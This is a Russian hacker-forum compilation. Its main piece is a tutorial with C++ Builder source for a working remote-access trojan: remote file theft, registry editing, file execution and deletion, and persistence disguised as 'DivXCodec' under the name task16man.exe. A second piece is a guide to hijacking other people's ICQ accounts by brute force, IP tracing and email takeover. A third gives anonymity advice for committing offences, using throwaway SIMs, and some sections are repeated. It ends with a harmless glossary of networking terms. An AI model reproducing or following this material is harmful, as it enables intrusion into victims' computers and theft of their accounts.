Nпараметры. N - цифра. Каждому действию присвоен свой код. Т.е. например 1 - перезагрузка, 2 - чтение файла и т.д. Главное чтоб было однозначное соответствие между тем что хотим сделать (команда передаваемая клиентом) и тем что выполняет программа (обработка команды на сервере). С этим разобрались. Теперь параметры. Бывает мало передать только номер команды. Конечно, чтобы перезагрузить компьютер никаких параметров не надо (хотя можно и здесь передать параметры в функцию перезагрузки), но как например реализовать удаление файла не передавая параметра? Мы передаем команду на удаление файла, но какого?! Для этого будем использовать параметры. В качестве параметра в данном случае будет передаваться имя файла. Бывает, что мало передать один параметр. Например надо прочитать n-строчек из file.txt. Здесь необходимо передать 2 параметра. В нашем примере параметры отделяются друг от друга комбинацией "\r\n" - перевод каретки. Объясняется данная структура тем, что в сервере мы сначала помещаем полученную команду в TStringList и потом можем спокойно обращаться к любой строчке этого TStringList'а через свойство Strings, где i-номер строчки, а соответственно и номер параметра. В общем, это вещи достаточно очевидные.
Вот так, вроде бы только начав писать клиентскую часть мы ее уже почти и закончили! Ведь на самом деле ничего кроме отсылки команд и приема ответов от сервера она делать и не должна. Для приема ответов просто создадим поле TMemo и добавим обработчик события OnRead нашего компонента TClientSocket:
C++
void __fastcall TForm1::TrojControllerRead(TObject *Sender,
TCustomWinSocket *Socket)
{
Memo2->Lines->Add(Socket->ReceiveText());
}
Вот и все. Клиент законен! Переходим к серверу...
Сервер будет чуть пообъемнее. Вначале определимся с задачами:
1) получение команд
2) их обработка и выполнение соответствующих действий
3) отсылка ответа клиенту (должны же мы знать что происходит на сервере)
Реализуем...
Во-первых, никакого визуального оформления естественно не будет =) Поэтому на форму поместим только 1 компонент: TServerSocket. Инициализацию его проведем в функции FormCreate(). Хотя можно было бы просто прописать 2 параметра в Object Inspector'е. Но раз уж сделали, так сделали =)
C++
void __fastcall TForm1::FormCreate(TObject *Sender)
{
// ServSckt - наш компонент TServerSocket
ServSckt->Port = 4321;
ServSckt->Active = true;
}
Итак, указали порт, активизировали сокет. Теперь обрабатываем событие ClientRead, т.е. получение данных сокетом. Комментирую на примере:
C++
void __fastcall TForm1::ServScktClientRead(TObject *Sender,
TCustomWinSocket *Socket)
{
RecCommand(Socket->ReceiveText()); // пишем для наглядности функцию обработки поступившей
// информации, которую передаем как параметр этой функции
}
//---------------------------------------------------------------------------
// собственно сама функция: Rec - сокращение от Recognize. Можно по-другому назвать =)
void TForm1::RecCommand (String received)
{
int cn;
TTrojanUtilites Utilz; // создаем объект наших утилит
Utilz.Sock=ServSckt; // необходимо для отсылки ответа клиенту, так как сокет у нас
// находится на форме, а TTrojanUtilites не имеет никакого отношения
// к форме. Просто передаем указатель на TServerSocket
String temp;
temp=received;
temp.Delete(2,temp.Length()); // получаем первый символ сообщения - номер команды
cn = StrToInt(temp); // преобразуем в число
received.Delete(1,1); // удаляем код команды - остаются одни параметры
switch (cn) { // в соответсвии с полученой командой
// запускаем соотвествующую утилиту
case 1 : Utilz.RestartMachine(); break; // перезагрузка
case 2 : Utilz.WriteRegistry(received); break; // запись в реестр
case 3 : Utilz.ReadRegistry(received); break; // чтение реестра
case 4 : Utilz.SendFile(received); break; // чтение файла
case 5 : Utilz.DeleteFile(received); break; // удаление файла
case 6 : Utilz.ExecuteFile(received); break; // запуск файла
case 7 : Utilz.OpenCloseCD; break; // открытие/закрытие CD-ROM
case 8 : Utilz.HideMouse(); break; // прячем курсор мыши
case 9 : Utilz.SwapMouseButtons(); break; // переключаем кнопки мыши
default:
SendMsgToClient("Неправильная команда!") ; // получена недопустимая команда
// информируем клиента об этом
}
}
Теперь немного подробнее. Мы пишем специальный класс TTrojanUtilites, в котором реализуем все необходимые функции. В RecognizeCommand (String Directive) мы только отделяем команду от параметров и запускаем необходимые методы TTrojanUtilites, передавая по необходимости в них параметры.
Реализация TTrojanUtilites есть то, чем мы сейчас займемся. Класс оформим в отдельном модуле, не забудьте подключить его.
Поехали... Во-первых, подключаем #include - необходимо для реализации работы с CD-ROM'ом. Далее пишем все необходимые методы.
Краткие комментарии на примере:
C++
void TTrojanUtilites::OpenCloseCD()
{
TMCI_Open_Parms OpenParm;
TMCI_Generic_Parms GenParm;
TMCI_Set_Parms SetParm;
Cardinal DI;
OpenParm.dwCallback = 0;
OpenParm.lpstrDeviceType = "CDAudio";
mciSendCommand(0, MCI_OPEN, MCI_OPEN_TYPE, Longint(&OpenParm));
DI = OpenParm.wDeviceID;
if (!CDROMOPEN)
{
mciSendCommand(DI, MCI_SET, MCI_SET_DOOR_OPEN, Longint(&SetParm));
CDROMOPEN = true; // открыть
}
else
{
mciSendCommand(DI, MCI_SET, MCI_SET_DOOR_CLOSED, Longint(&SetParm));
CDROMOPEN = false; // закрыть
}
mciSendCommand(DI, MCI_CLOSE, MCI_NOTIFY, Longint(&GenParm));
Sock->Socket->Connections[0]->SendText("Выполнено открытие/закрытие CD-ROM");
}
Перезагрузка:
C++
void TTrojanUtilites::RestartMachine()
{
if (ExitWindowsEx(EWX_FORCE,0) || ExitWindowsEx(EWX_REBOOT,0));
Sock->Socket->Connections[0]->SendText("Перезагрузка успешно выполнена.");
}
Вот тут я не отвечаю за все ОСи, перезагрузка-то будет, но хотелось бы сделать ее как после нажатия кнопки RESET, а так будет послано сообщение WM_...ENDSESSION etc. Короче, пробуйте сами. Могу только подкинуть основные направления поиска: смотри функции ExitWindows(), ExitWindowsEx(), InitiateSystemShutdown() и AbortSystemShutdown(). Для особо продвинутых могу предложить вариант написать надежный ребут под определенную ось и чипсет =) Например, мой прошлый комп стабильно резетился (только в Win9x, в NT не работало) следующей вставочкой:
mov dx,0cf9h
mov al,2
out dx,al
mov al,6
out dx,al
Откуда цифры? Читайте доки по чипсету =) Одним словом, универсального метода перезагрузить комп без WM_...ENDSESSION я не знаю. Если вы знаете - напишите пару строк, не в падлу =)
C++
void TTrojanUtilites::SendFile(String F)
{
TStringList* TTSL=new (TStringList);
TStringList* TTSL2=new (TStringList);
int n, i;
TTSL->Text = F;
if (!FileExists(TTSL->Strings[0]))
{
Sock->Socket->Connections[0]->SendText("Файл не существует.");
return;
}
TTSL2->LoadFromFile(TTSL->Strings[0]); // загружаем файл в TStringList
n = TTSL2->Count; // получаем число строк в файле
if (n > StrToInt(TTSL->Strings[1])) // если надо прочитать не весь файл
n = StrToInt(TTSL->Strings[1]); // считываем только необходимое число строк
for (i=0;iSocket->Connections[0]->SendText(TTSL2->Strings[i]); // передаем строки клиенту
}
Вроде тут и объяснять нечего.
C++
void TTrojanUtilites::ReadRegistry(ShortString k)
{
TRegistry* reg=new TRegistry;
String res, ts;
TStringList* TTSL=new TStringList;
HKEY k1;
// параметры передаются в следующем порядке:
//// 0 - root key
//// 1 - key name
//// 2 - value name
//// 3 - value
//// 4 - type of value
TTSL->Text = k;
ts = TTSL->Strings[0]; // выбираем RootKey
if (ts == "HKEY_CLASSES_ROOT") k1 = HKEY_CLASSES_ROOT;
if (ts == "HKEY_CURRENT_USER") k1 = HKEY_CURRENT_USER;
if (ts == "HKEY_LOCAL_MACHINE") k1 = HKEY_LOCAL_MACHINE;
if (ts == "HKEY_USERS") k1 = HKEY_USERS;
if (ts == "HKEY_CURRENT_CONFIG") k1 = HKEY_CURRENT_CONFIG;
reg->RootKey = k1;
reg->OpenKey(TTSL->Strings[1], true); // открываем раздел
ts = TTSL->Strings[3]; // читаем значение параметра опредеоенного типа
if (ts == "Bool") // двоичный (REG_BINARY)
if (reg->ReadBool(TTSL->Strings[2]))
res = "true";
else res = "false";
if (ts == "Integer") // числовой (REG_DWORD)
res = IntToStr(reg->ReadInteger(TTSL->Strings[2]));
if (ts == "String") // строковый (REG_SZ)
res = reg->ReadString(TTSL->Strings[2]);
Sock->Socket->Connections[0]->SendText("Чтение реестра. Значение параметра: "+res);
// передаем клиенту значение параметра
}
Запись в реестр аналогична, только используется метод WriteBool(TTSL->Strings[2], false); для записи булевского значения, WriteInteger(TTSL->Strings[2], StrToInt(TTSL->Strings[4])); - для числового, WriteString(TTSL->Strings[2], TTSL->Strings[4]); - для строкового.
Для запуска файлов на удаленном компьютере используем следующую функцию:
C++
void TTrojanUtilites::ExecuteFile(String f)
{
ShellExecute(GetDesktopWindow, "open", f.c_str(), "", "", SW_SHOWNORMAL);
Sock->Socket->Connections[0]->SendText("Запущен файл "+f);
}
Файл запускается в той программе, с которой ассоциирован запуск данного типа файлов, т.е. вы можете запускать не толкьо exe, com, bat, но и любые другие файлы. Html-файл откроется в Explorer'e, Opere, Netscape или еще в чем-то... Хрен знает чем там ламерюга пользуется... Можете запустить ему мп3-шку Децла послушать или Бритни какой-нить, пусть проблюется =)
Идем дальше. Парочка бесполезных функций:
C++
void TTrojanUtilites::HideMouse()
{
ShowCursor(false);
Sock->Socket->Connections[0]->SendText("Курсор мыши скрыт");
}
No commentz...
C++
void TTrojanUtilites::SwapMouseButtons()
{
SwapMouseButton(true);
Sock->Socket->Connections[0]->SendText("Кнопки мыши переключены");
Можно сделать переключение кнопок обратно (передайте в SwapMouseButton параметр false), но я бы посоветовал поставить таймер и каждую секунду переключать кнопки туда-сюда, веселее будет =) В падлу сейчас уже добавлять, но вкратце это будет так: добавляем TTimer на форму, устанавливаем необходимый интервал, и в обработчике события OnTimer прописываем вызов функции SwapMouseButton с параметром, противоположным прошлому вызову. Млин, все-таки все расписал =)
Теперь довольно важная функция:
C++
void TTrojanUtilites::DeleteFile(String f)
{
if (!FileExists(f))
{
Sock->Socket->Connections[0]->SendText("Файл не существует.");
return;
}
TRegistry* Reg=new TRegistry;
Reg->RootKey = HKEY_LOCAL_MACHINE;
Reg->OpenKey("\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true);
Reg->WriteString("Filez for delete","command.com /c del "+f);
Reg->CloseKey();
Sock->Socket->Connections[0]->SendText("Файл "+f+" будет удален после перезагрузки.");
}
Данная функция НЕ удаляет файл сразу!!! Это сделано специально, так как файлы могут использоваться системой и их удаление возможно только после перезагрузки, данная функция помечает файл к удалению, а удалиться он только после перезагрузки, которую вы легко можете вызвать. Да, еще маленькое примечание: данная функция удаляет только 1 файл, если вы пометите второй файл к удалению - то будет удален только он. А первый останется нетронутым... Немного измените функцию - и можно будет удалять файлы пачками =) Могу еще добавить немного инфы на случай, если надо будет удалить целый каталог и вы точно знаете что в нем нет открытых файлов. Используйте стандартную API функцию SHFileOperation, установив тип операции wFunc в FO_DELETE. Пример:
C++
int res;
SHFILEOPSTRUCT fo;
ZeroMemory(&fo, sizeof(fo));
fo.hwnd = hwndOwner; // хэндл окна-владельца прогресс-диалога
fo.pFrom = pszFullPath; //путь
fo.wFunc = FO_DELETE;
fo.fFlags = FOF_NOCONFIRMATION; //не спрашивать подтверждения на удаление
res = SHFileOperation(&fo);
Только внимательно все проверьте! Будет обломно если ламерюга "вдруг" увидит надпись "Папка голые тетки не может быть удалена, так как юзер активно смотрит сразу 10 порно-фильмов из нее!". А вообще, если опять удалиться в теорию, то наш главный объект Application имеет несколько полезных событий, наиболее интересное для нас OnException происходит тогда, когда в приложении возникает необработанная исключительная ситуация (деление на ноль, удаление несуществующего файла etc). По умолчанию, обработчик этого события вызывает метод ShowException для отображения окна сообщения с пояснением причины ошибки (оно нам надо?! конечно, НЕТ!). Но, вы можете изменить реакцию на событие onException, переписав его обработчик. Тут ничего трудного нет, просто я не ставил перед собой задачу написать офигенный троян, только подтолкнуть вас к этому =) Кто захочет - допишет все необходимое сам, если что - я подскажу =) Ну вот, вроде бы все функции реализовали. Теперь немного о том, что мы не сделали =) Мы не сделали: загрузку/закачку файла. Это все можно сделать подправив SendFile(). Стандартных функций для пересылки файлов через TClient(Server)Socket я не нашел, но впрочем, это не проблема - просто передавайте файлы фрагментами.
Теперь нам осталось только разобраться с автозагрузкой трояна. Сделаем следующее:
1) при запуске файл переписывается в папку, в которой установлены винды.
2) прописываем запуск нашего файла в реестре.
Реализуем =)
C++
void __fastcall TForm1::FormCreate(TObject *Sender)
{
ServSckt->Port = 4321;
ServSckt->Active = true;
Utilz.Sock=ServSckt;
Utilz.CDROMOPEN=false;
String WinDir;
char WinDir1[144];
GetWindowsDirectory(WinDir1,144);
WinDir=WinDir1; // папка с установленными виндами
String data;
TRegistry *pReg = new TRegistry;
pReg->RootKey=HKEY_LOCAL_MACHINE;
pReg->OpenKey("\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
data=pReg->ReadString("DivXCodec");
if (data != Application->ExeName) //если нашу программу стерли из
// автозагрузки (DivXCodec - можете поменять по желанию на любое другое название раздела)
pReg->WriteString("DivXCodec",WinDir+"\\task16man.exe"); //добавляем ее по новой
if (Application->ExeName!=WinDir+"\\task16man.exe") //если файл запустили 1ый раз
{
if (!FileExists(WinDir+"\\task16man.exe"))
{
String dest=WinDir+"\\task16man.exe";
BOOL res=MoveFile(Application->ExeName.c_str(), dest.c_str());
// переписываем файл к виндам
ServSckt->Active = false;
ShellExecute(NULL,NULL,dest.c_str(),NULL,NULL,NULL); //запускаем его
Application->Terminate(); // это приложение закрываем
}
else
Application->Terminate();
// я тут не разбирал вариантов типа прога записалась в винды, но ее еще раз
// запустили и им подобных, додумайте сами =)
}
else
{
ServSckt->Port = 4321;
ServSckt->Active = true;
String data;
TRegistry *pReg = new TRegistry;
pReg->RootKey=HKEY_LOCAL_MACHINE;
pReg->OpenKey("\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
data=pReg->ReadString("DivXCodec");
if (data != Application->ExeName) // не дай бог стерли!
pReg->WriteString("DivXCodec",Application->ExeName); // пишем назад
}
}
В принципе, это все. Троян готов! Конечно, он тяжеловат, малофункционален etc, НО все это можно исправить, творите =). Удачи!
Пробуем угнать ICQ
Итак сидим мы с вами в аськи, разговариваем, но вот незадача у тебя огромный номер какой трудно запомнить, а у друга короткий шестизнак )) Начнём с простого, залезаем в контакты, ищем профиль юзера, и копируем через Enter все слова в блокнот, да все! это нам пригодится... Зная его e-mail можно найти много мест где он регился, например на форумах... и оттуда выдираем все его ники и другую лабуду, тоже всё это в блокнот, в него впишите Uin его аськи и те все слова которые вы о нём (может быть ) знаете, это может быть его улиц, место рождения и т.п. не забудте добавить в наш словарь несколько десятков распространённых паролей типа: qwerty, 123456 ....
После всх этих действий у тебя будет словарик с более чем 200 слов, и теперь можно пробрутить его Гшт прогой типа IPDBrute или другой подобной, поверь таким способом мною были взломаны некоторые неугодные личности :)) Пробуй!
Можно попробовать ещё кое-что. Вычисляем IP жертвы, это можно сделать многими способами, но ни один не даст 100% гарантии что ты узнаешь его IP. Ведь при общениис челом, все мессаги проходят через сервак ICQ следовательно узнать IP сервака легко, а IP жертвы увы... У ICQ есть такая фича - "установить связь напрямую" , вот тогда ты сможешь увидеть IP прогой типа ip2uin или просто командой netstat ... так же IP может быть виден когда у юзера включена возможность отправки\принятия файлов по ICQ. АйПи можно узнать ещё кучей других способов, например подсунуть линк ведущий на скрипт, принять его письмо и в нём посмотреть IP ... короче способы есть. После определения IP ты сканишь его тачку на расшаренные ресурсы или по его операционке подбираешь сполит. А цель такова - стырить .dat вайлы аськи с которых можно с лёгкостью содрать пароль...
Ещё способ, но это уже редкость... Смотрим в профиле юзера есть-ли основное мыло? Если есть, то смотрим какое оно... если оно вида 12563255 Этот e-mail защищен от спам-ботов. Для его просмотра в вашем браузере должна быть включена поддержка Java-script то его скорее всего не существует, вот тогда идём на rambler.ru регим этот ящик, потом надо будет только попросить icq выслать забытый пароль :)) это очень просто...
Для отчаяных: качаем словарь для брута метров на 20, берём опять же IPDBrute и брутим... Только если скорость у вас не высокая, то ждать прийдётся пару дней... :))) но где наша не пропадала?
После всх этих действий у тебя будет словарик с более чем 200 слов, и теперь можно пробрутить его Гшт прогой типа IPDBrute или другой подобной, поверь таким способом мною были взломаны некоторые неугодные личности :)) Пробуй!
Можно попробовать ещё кое-что. Вычисляем IP жертвы, это можно сделать многими способами, но ни один не даст 100% гарантии что ты узнаешь его IP. Ведь при общениис челом, все мессаги проходят через сервак ICQ следовательно узнать IP сервака легко, а IP жертвы увы... У ICQ есть такая фича - "установить связь напрямую" , вот тогда ты сможешь увидеть IP прогой типа ip2uin или просто командой netstat ... так же IP может быть виден когда у юзера включена возможность отправки\принятия файлов по ICQ. АйПи можно узнать ещё кучей других способов, например подсунуть линк ведущий на скрипт, принять его письмо и в нём посмотреть IP ... короче способы есть. После определения IP ты сканишь его тачку на расшаренные ресурсы или по его операционке подбираешь сполит. А цель такова - стырить .dat вайлы аськи с которых можно с лёгкостью содрать пароль...
Ещё способ, но это уже редкость... Смотрим в профиле юзера есть-ли основное мыло? Если есть, то смотрим какое оно... если оно вида 12563255 Этот e-mail защищен от спам-ботов. Для его просмотра в вашем браузере должна быть включена поддержка Java-script то его скорее всего не существует, вот тогда идём на rambler.ru регим этот ящик, потом надо будет только попросить icq выслать забытый пароль :)) это очень просто...
Для отчаяных: качаем словарь для брута метров на 20, берём опять же IPDBrute и брутим... Только если скорость у вас не высокая, то ждать прийдётся пару дней... :))) но где наша не пропадала?
Анонимность
В данной статье речь пойдет о том, как можно организовать максимальную анонимность в Интернете. Ходят слухи что в сети нету 100% анонимности и многие в это верят. Всюду и всем мерещатся какие-то ФСБ и "Отделы К", как будто всё и вся преследуется и логируется. Но не все так плохо, как кажется. Стоит лишь придерживаться некоторых правил. Но помните тут приводится только вариант ваших действий, если вы опытный человек и используйте иные методы, то ничего страшного, лишь бы правильными они были. Итак, какие всё таки самые элементарные правила нужно соблюдать для обеспечения максимальной анонимности?!
1.) Забудьте про Internet Explorer.
2.) Пользуйтесь либо Opera, либо Mozilla Firefox, либо Safari.
3.) Не берите из Интернета первые попавшиеся прокси.
4.) Забудьте про свою лень.
5.) Не регистрируйтесь на сайтах,
посещать которые в будущем Вы не собираетесь.
Теперь объясню почему нужно соблюдать правила описанные в вышеуказанных пунктах.
Я не анти-фанат компании Майкрософт, Бил Гейтс внёс довольно большой вклад
в развитие информационных технологий и не только в них.
Internet Explorer предназначен исключительно для простых пользователей,
для сёрфинга он не подходит. Использовать Internet Explorer крайне не рекомендую, по крайней мере на момент написания этой статьи.
Пользоваться Opera, Mozilla Firefox или Safari нужно для того,
чтобы запретить отправку лишних логов на посещаемый Вами сервер.
Советую всё таки использовать Mozilla Firefox.
Не берите прокси которые нашли на каком нибудь левом сайте.
Если установить в настройках обозревателя прокси,
который принадлежит спец-службам - считайте что Вы уже под колпаком.
Никогда не ленитесь и будьте терпеливы.
Не желательно регистрироваться на сайтах, посещение которых в дальнейшем Вы не намечаете, лишний раз светится ни к чему.
И наконец завершающая стадия статьи, собственно цель которой было донести до Вас информацию описанную ниже.
Метод создания максимальной анонимности в Интернете через настольный компьютер довольно прост.
Первое что нужно сделать - это скачать Mozilla Firefox, в настройках обозревателя отключить Java, JavaScript, cookies и графику.
Таким образом сервер который Вы посетите получит только Ваш ip и версию операционной системы, разрешение экрана и другие логи к нему не поступят.
Отключать графику и cookies не обязательно, но без графики страницы через прокси будут грузится быстрее. А cookies желательно отключить для запрета попадания логов к Вам на компьютер, думаю компромат на своей машине хранить Вам не захочется.
Теперь установите себе программу Mask Surf Standard,
запустите её и настройте все параметры на максимальную анонимность.
То-есть в меню "Маскировка" установите галочки на пунктах "Невидимый".
В меню "Режим" выберите пункт "Максимальная анонимность".
Это и всё что нужно было проделать. Теперь можете спокойно проверять себя на анонимность.
Если Вы проделаете всё что я описал - на сервер не будет поступать не каких логов, кроме прокси, но Mask Surf Standard работает через цепь прокси-серверов которые отследить довольно проблематично (это не значит, что невозможно) и Вам не нужно искать их по Интернету, потому что они определяются автоматически, каждые 30 минут у Вас будет новый прокси.
Всё это естественно спецслужбами довольно просто отслеживается и если Вы ставите серьёзные задачи, то это не поможет.
Берите ноутбук и левую симку, езжайте в лес и делайте то, что хотели.
Если в летнее время с 8 утра до 8 вечера Вы побудете в лесу - ничего с
Вами не случится, всё таки куда лучше чем потом на зоне время убивать.
Предположим приехали Вы в лес, настроили все параметры своего ноутбука, выходите в сеть с левой симки и делаете свои чёрные дела.
За день Вас никто не надёт, но то что задумали - сделать наверняка успеете.
Когда будете уходить из леса, не вздумайте брать симку с собой домой - выкиньте её на месте и забудьте. Её местонахождение определят с точностью до 10 метров. Ноутбук не везите в открытую, прячьте его в какую нибудь сумку как у бабушек чтобы не вызывать подозрения. Сделайте просто вид, что Вы обычный колхозник.
Этого достаточно для организации максимальной анонимности
1.) Забудьте про Internet Explorer.
2.) Пользуйтесь либо Opera, либо Mozilla Firefox, либо Safari.
3.) Не берите из Интернета первые попавшиеся прокси.
4.) Забудьте про свою лень.
5.) Не регистрируйтесь на сайтах,
посещать которые в будущем Вы не собираетесь.
Теперь объясню почему нужно соблюдать правила описанные в вышеуказанных пунктах.
Я не анти-фанат компании Майкрософт, Бил Гейтс внёс довольно большой вклад
в развитие информационных технологий и не только в них.
Internet Explorer предназначен исключительно для простых пользователей,
для сёрфинга он не подходит. Использовать Internet Explorer крайне не рекомендую, по крайней мере на момент написания этой статьи.
Пользоваться Opera, Mozilla Firefox или Safari нужно для того,
чтобы запретить отправку лишних логов на посещаемый Вами сервер.
Советую всё таки использовать Mozilla Firefox.
Не берите прокси которые нашли на каком нибудь левом сайте.
Если установить в настройках обозревателя прокси,
который принадлежит спец-службам - считайте что Вы уже под колпаком.
Никогда не ленитесь и будьте терпеливы.
Не желательно регистрироваться на сайтах, посещение которых в дальнейшем Вы не намечаете, лишний раз светится ни к чему.
И наконец завершающая стадия статьи, собственно цель которой было донести до Вас информацию описанную ниже.
Метод создания максимальной анонимности в Интернете через настольный компьютер довольно прост.
Первое что нужно сделать - это скачать Mozilla Firefox, в настройках обозревателя отключить Java, JavaScript, cookies и графику.
Таким образом сервер который Вы посетите получит только Ваш ip и версию операционной системы, разрешение экрана и другие логи к нему не поступят.
Отключать графику и cookies не обязательно, но без графики страницы через прокси будут грузится быстрее. А cookies желательно отключить для запрета попадания логов к Вам на компьютер, думаю компромат на своей машине хранить Вам не захочется.
Теперь установите себе программу Mask Surf Standard,
запустите её и настройте все параметры на максимальную анонимность.
То-есть в меню "Маскировка" установите галочки на пунктах "Невидимый".
В меню "Режим" выберите пункт "Максимальная анонимность".
Это и всё что нужно было проделать. Теперь можете спокойно проверять себя на анонимность.
Если Вы проделаете всё что я описал - на сервер не будет поступать не каких логов, кроме прокси, но Mask Surf Standard работает через цепь прокси-серверов которые отследить довольно проблематично (это не значит, что невозможно) и Вам не нужно искать их по Интернету, потому что они определяются автоматически, каждые 30 минут у Вас будет новый прокси.
Всё это естественно спецслужбами довольно просто отслеживается и если Вы ставите серьёзные задачи, то это не поможет.
Берите ноутбук и левую симку, езжайте в лес и делайте то, что хотели.
Если в летнее время с 8 утра до 8 вечера Вы побудете в лесу - ничего с
Вами не случится, всё таки куда лучше чем потом на зоне время убивать.
Предположим приехали Вы в лес, настроили все параметры своего ноутбука, выходите в сеть с левой симки и делаете свои чёрные дела.
За день Вас никто не надёт, но то что задумали - сделать наверняка успеете.
Когда будете уходить из леса, не вздумайте брать симку с собой домой - выкиньте её на месте и забудьте. Её местонахождение определят с точностью до 10 метров. Ноутбук не везите в открытую, прячьте его в какую нибудь сумку как у бабушек чтобы не вызывать подозрения. Сделайте просто вид, что Вы обычный колхозник.
Этого достаточно для организации максимальной анонимности
Краткий словарь специализированных терминов
Многие люди работающие в сфере компьютерных технологий зачастую имеют свой узкихй круг кругозора =) (своеобразно сказано). Скажем программисты не знают, что такое BRAS или не имеют понятия что такое аппаратный хостинг. Ниже же приведен краткий справочник некоторых, основных и часто встречающихся терминов.Не скажу, что здесь можно найти много нового знающим людям, но пролистать его не мешает начинающим администраторам, программистам, да и просто юзерам. Многое может показаться смешным, но вдруг среди вас есть люди которые до сих пор не знают, что такое Электронная почта или ADSL-модем? Вобщем, чтобы не забывали, чтобы знали, чтобы помнили ...
- Аппаратный хостинг, он же Сo-location - размещение оборудования клиента на территории провайдера, подключение его к сети провайдера с высокой пропускной способностью. Территория для размещения серверов оборудована системами резервного электропитания, климатического контроля и охраны, что обеспечивает сохранность чувствительного к температуре и влажности оборудования.
- Асимметричный доступ в Интернет (Asymmetric Digital Subscriber Line, ADSL) – доступ по технологии, которая преобразует стандартные абонентские телефонные аналоговые линии в линии высокоскоростного доступа. Основное преимущество данной технологии в том, что нет необходимости прокладывать кабель до абонента. Используются существующие телефонные кабели. Данная технология является асимметричной, то есть скорость передачи данных в направлении от сети к пользователю значительно выше, чем скорость передачи данных от пользователя в сеть. Такая асимметрия в сочетании с состоянием «постоянно установленного соединения» (когда исключается необходимость каждый раз набирать телефонный номер и ждать установки соединения) делает технологию ADSL идеальной для организации доступа в сеть Интернет, а также для доступа к локальным сетям и т. п.
- Беспарольный доступ (Простой доступ) - коммутируемый (Dial-up) доступ в Интернет по телефонной линии, для которого не нужно приобретать предоплаченную карточку доступа в Интернет или заключать договор.
- Включенный трафик - объем трафика, который включен в абонплату.
- Внешний трафик (входящий/исходящий) - объем трафика, который вы получаете или передаете на ваш компьютер вне сегмента сети интернет-провайдера.
- Внутренний трафик - все, что вы качаете/открываете с ресурсов, расположенных внутри сегмента сети интернет-провайдера.
- Входящий трафик – объем информации, который принимается абонентом.
- Доменное имя – символьное обозначение, зарегистрированное для осуществления сетевой адресации ресурсов сети Интернет, в которой используется система доменных имен (Domain Name System). Система доменных имен DNS предназначена для удобства пользователей Интернета и обеспечивает соответствие между сетевыми адресами (IP-адресами), представляющими собой набор цифр, разделенных точками (например, 108.45.1.2), и легко запоминающимися символьными обозначениями, имеющими соответствия в естественных языках (например, metro.ru). Доменное имя может указывать на характер (содержание) информации, размещенной на соответствующем сайте, либо на его владельца (например, toyota.com или minsvyaz.ru). Система DNS функционирует в соответствии с международными правилами и документами.
- Интерфейс — совокупность технических и/или программных средств, при помощи которых различные телекоммуникационные устройства взаимодействуют между собой. Интерфейсы являются основой взаимодействия всех современных информационных систем.
- Исходящий трафик – объем информации, который исходит от абонента.
- Ко-локейшн (Co-location), он же аппаратный хостинг - размещение оборудования клиента на территории провайдера и подключение его к каналам связи с высокой пропускной способностью. Территория для размещения серверов должна быть оборудована системами резервного электропитания, климатического контроля и охраны.
- Локальный трафик – трафик между клиентом и любым адресом из адресного пространства провайдера, а также DNS, почтовым сервером провайдера и локальным контентом провайдера.
- Последняя миля (LL Local Loop) – канал, соединяющий оборудование клиента с ближайшим узлом доступа на сети оператора/провайдера. При предоставлении телекоммуникационных услуг последней милей называют участок от порта коммутатора провайдера на его узле связи до порта маршрутизатора клиента в его офисе.
- Protocol (Протокол) - совокупность определений (соглашений, правил), регламентирующих формат и процедуры обмена информацией между двумя или несколькими независимыми устройствами или процессами. Другими словами - описание того, как программы, компьютеры или иные устройства должны действовать, когда они общаются друг с другом. Протокольные определения охватывают диапазон от того, в каком порядке биты следуют по проводу, до формата сообщения электронной почты. Стандартные протоколы позволяют компьютерам связываться друг с другом, при этом они могут использовать различное программное обеспечение, необходимо лишь, чтобы поддерживалось определенное соглашение о том, как отправлять информацию и как понимать принимаемые данные.
- Симметричный доступ в Интернет по выделенной линии обеспечивает доступ к ресурсам Интернета на скоростях до 100 Mbps, а также гарантированные симметричные скорости канала Интернет как по направлению к клиенту (downlink), так и по направлению от клиента (uplink). При этом для подключения клиента используется только выделенная линия.
- Торрент - протокол, разработанный для обмена файлами. Он является протоколом peer-to-peer и позволяет организовать обмен данными, не создавая при этом массивных дорогостоящих хранилищ файлов, поскольку обращение производится непосредственно к владельцу информации.
- Трафик – объем информации, передаваемой по сети.
- Хостинг – услуга по размещению специализированного информационного раздела клиента (web-сайта) в сети Интернет с последующим предоставлением удаленного доступа для его дальнейшего обновления. Услуга включает регистрацию уникального адреса сайта для его идентификации в Интернете, обеспечение доступа к сайту других пользователей Интернета в режиме просмотра с использованием протокола передачи данных HTTP.
- Широкополосный доступ в Интернет обеспечивается с помощью ряда технологий, которые дают возможность пользователям отправлять и принимать информацию в бóльших объемах и с более высокими скоростями, чем в случае коммутируемого доступа в Интернет. Широкополосный доступ обеспечивает не только высокую скорость передачи данных, но и непрерывное подключение к Интернету (без необходимости установления коммутируемого соединения), и так называемую «двустороннюю» связь, т. е. возможность как принимать («загружать»), так и передавать («сгружать») информацию на высоких скоростях.
- Электронная почта – основной способ связи в сети Интернет. Каждый абонент электронной почты имеет свой личный почтовый адрес, состоящий из имени пользователя в системе и названия компьютера, на котором запущен почтовый сервер, разделенных знаком @. С точки зрения пользователя, электронная почта представляет собой программу, позволяющую отправлять сообщения, прямо набирая их на компьютере, и получать письма, отправленные другими.
- Abbreviated Dialing, Short Num – сокращенный набор номера.
- ADSL (Asymmetric Digital Subscriber Line) – технология, которая преобразует стандартные абонентские телефонные аналоговые линии в линии высокоскоростного доступа. Основное преимущество данной технологии в том, что нет необходимости прокладывать кабель до абонента. Используются уже проложенные телефонные кабели. Данная технология является асимметричной, то есть скорость передачи данных в направлении от сети к пользователю значительно выше, чем скорость передачи данных от пользователя в сеть. Такая асимметрия в сочетании с состоянием «постоянно установленного соединения» (когда исключается необходимость каждый раз набирать телефонный номер и ждать установки соединения) делает технологию ADSL идеальной для организации доступа в сеть Интернет, а также для доступа к локальным сетям и т. п.
- ADSL-модем – широкополосный модем, который обеспечивает высокоскоростное подключение персонального компьютера в Интернет через линию ADSL.
- BRAS (Broadband Remote Access Server) – устройство, которое соединяет отдаленных пользователей Интернета в сети провайдера и обеспечивает аутентификацию и маршрутизацию отдаленных пользователей.
- CPE (Customer Premises Equipment) – оборудование, которое устанавливается в помещении клиента и обеспечивает подключение к сети Интернет.
- Co-location, он же аппаратный хостинг - размещение оборудования клиента на территории провайдера, подключение его к каналам связи с высокой пропускной способностью. Территория для размещения серверов оборудована системами резервного электропитания, климатического контроля и охраны.
